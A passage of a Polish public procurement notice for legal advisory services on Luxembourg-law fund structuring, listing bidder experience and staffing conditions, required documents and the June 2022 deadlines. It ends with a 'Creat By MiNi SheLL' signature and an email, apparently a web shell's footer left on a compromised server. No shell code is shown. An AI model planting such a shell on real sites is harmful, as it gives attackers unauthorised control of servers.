lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 2 (dwie) usługi zakończone lub trwające nadal, z których każda wynosiła minimum 90 000 zł (słownie złotych dziewięćdziesiąt tysięcy 00/100) brutto każda, przy czym w przypadku usług trwających nadal wykonawca musi wykazać, że do terminu składania ofert wykonał usługi o wartości co najmniej 90 000 zł (słownie złotych: dziewięćdziesiąt tysięcy 00/100) brutto (każda z usług) polegające na:<br/>- świadczeniu usług doradztwa przy transakcjach typu „fund structuring” pod prawem luksemburskim, w tym świadczenia usług na rzecz prywatnych lub publicznych funduszy inwestycyjnych private equity/venture capital, w tym funduszu funduszy, w zakresie strukturyzacji warunków umowy inwestycyjnej (LPA) lub side letters, lub <br/>- świadczeniu usług doradztwa prawnego, w tym podatkowego dla inwestorów przy przystępowaniu do i wykonywaniu umów inwestycyjnych (LPA) lub side letter pod prawem luksemburskim, dotyczącej współpracy stron w okresie co najmniej 10 lat o wartości zobowiązań stron co najmniej 100.000.000 PLN.<br/><br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, zamawiający nie dopuszcza łączenia usług i ich wartości a co najmniej jeden z wykonawców musi spełniać powyższy warunek samodzielnie.<br/><br/>1. dotyczącej osób:<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje zespołem skierowanym do wykonania zamówienia, składającym się z co najmniej 3 (trzech) osób, które posiadają uprawnienia do wykonywania zawodu adwokata lub radcy prawnego, zgodnie z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze lub ustawą z dnia 6 lipca 1982 r. o radcach prawnych, <br/>w tym:<br/>- minimum 1 (jedną) osobą, która posiada co najmniej roczne doświadczenie zawodowe (tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych) polegające na świadczeniu usług doradztwa przy transakcjach typu „fund structuring” pod prawem luksemburskim, w tym świadczenia usług na rzecz prywatnych lub publicznych funduszy inwestycyjnych private equity/venture capital, w tym funduszy, w zakresie strukturyzacji warunków umowy inwestycyjnej (LPA) lub side letters, lub<br/>- minimum 1 (jedną) osobą, która posiada co najmniej roczne doświadczenie zawodowe (tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych) polegające na świadczeniu usług doradztwa prawnego, w tym podatkowego dla inwestorów przy przystępowaniu do i wykonywaniu umów inwestycyjnych (LPA) lub side letter pod prawem luksemburskim, dotyczącej współpracy stron <br/>w okresie co najmniej 10 lat o wartości zobowiązań stron co najmniej 100.000.000 PLN<br/><br/>Przez „doświadczenie zawodowe” zamawiający rozumie lata czynne zawodowo w wykonywaniu zawodu radcy prawnego lub adwokata. <br/>Spośród osób wskazanych w wykazie, wykonawca winien wskazać jedną osobę, która będzie pełnić funkcję kierownika zespołu, odpowiedzialnego za kontakt z zamawiającym oraz zastępcę kierownika zespołu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>- aktualnych na dzień złożenia odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>- oświadczenia w zakresie wykazania, że wykonawca nie podlega wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) - wg wzoru stanowiącego załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający żąda następujących podmiotowych środków dowodowych w celu potwierdzenia spełniania przez wykonawcę<br/>warunków udziału w postępowaniu, dotyczących zdolności technicznej lub zawodowej:<br/>1. dotyczących wykonawcy – wykazu usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy (zgodnie z<br/>wzorem stanowiącym załącznik nr 10 do SWZ);<br/>2. dotyczących osób – wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (zgodnie z wzorem stanowiącym załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Dokumenty i oświadczenia, które należy złożyć wraz z ofertą:<br/>1)	formularz ofertowy – załącznik nr 1 do SWZ;<br/>2)	oświadczenie dotyczące przesłanek wykluczenia z postępowania – załącznik nr 2 do SWZ;<br/>3)	pełnomocnictwo / pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika (jeżeli dotyczy).<br/> W przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy <br/>– pełnomocnictwo może być sporządzone wg wzoru stanowiącego załącznik nr 5 do SWZ. <br/> Pełnomocnik może być ustanowiony do reprezentowania wykonawców <br/>w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.<br/>4)	zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdziale 16 ust. 4 SWZ – załącznik nr 6 do SWZ (jeśli wykonawca powołuje się na zasoby innego podmiotu).<br/>5)	oświadczenie dotyczące spełnienia warunków udziału w postępowaniu – załącznik nr 9 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidywane zmiany zmiany postanowień umowy zostały określone w SWZ, Załącznik nr 3 do SWZ – Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-24 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami na platformie zakupowej pod adresem platformazakupowa.pl/pn/damon na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-24 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com